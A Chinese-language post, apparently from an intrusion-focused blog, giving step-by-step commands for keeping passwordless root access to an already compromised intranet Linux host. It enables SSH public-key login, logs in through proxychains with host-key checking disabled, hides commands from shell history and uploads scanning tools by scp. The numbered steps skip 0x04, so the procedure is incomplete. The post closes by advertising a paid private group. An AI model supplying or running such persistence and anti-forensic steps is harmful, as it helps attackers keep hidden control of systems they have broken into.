原文链接;无密码正向直连内网linux目标机
比如,前期通过一些 Rce,提权 或者其它方式,拿到内网一台linux 目标机的root权限,但用户密码hash跑不出来,机器无法正常出网,Webshell 里操作实在是麻烦, 费劲,为了能更方便的进行后续的内网渗透操作,现在就迫切需要一个真正的pts终端,怎么搞 ? 很简单,如下
启用Ssh证书登录,并重启SSH 服务 [ 此处linux发行版为 CentOS7.x 其它发行版同理 ] - # echo RSAAuthentication yes >> /etc/ssh/sshd_config
- # echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
- # systemctl restart sshd
复制代码
0x02 然后,回到本地linux上生成密钥对 - # ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
- # ls -al /root/.ssh/
- # cp /root/.ssh/id_rsa.pub /home/sot/Desktop/
- # mv /home/sot/Desktop/id_rsa.pub /home/sot/Desktop/authorized_keys
复制代码 0x03 接着,回到内网linux目标机上- # proxychains4 ssh -t -o "StrictHostKeyChecking no" root@172.16.7.28
- # export HISTCONTROL=ignorespace
- # echo $HISTCONTROL
- # w
复制代码
0x05 同理,利用Scp 无密码互传文件
- # proxychains4 scp -P 22 -r /root/Srvscan root@172.16.7.28:/usr/tmp/Srvscan
- # proxychains4 scp -P 22 -r /root/fingerprint.py root@172.16.7.28:/usr/tmp/
- # proxychains4 scp -P 22 -r /root/GetWebBanner.py root@172.16.7.28:/usr/tmp/
复制代码
如果觉得确实还不错,欢迎积极转发留言,以便让更多真正需要的人也能看到,如文中遇到错误,欢迎随时私信指正,非常感谢
另外,也非常期待能和更多真正志同道合弟兄一起深入交流学习,( 还是那句话,维护不易,乱七八糟的人就不要来了,非常感谢 ),密圈已适时优惠,需要的弟兄,请尽快,定期进来偷资料的,请自行离开,谢谢
|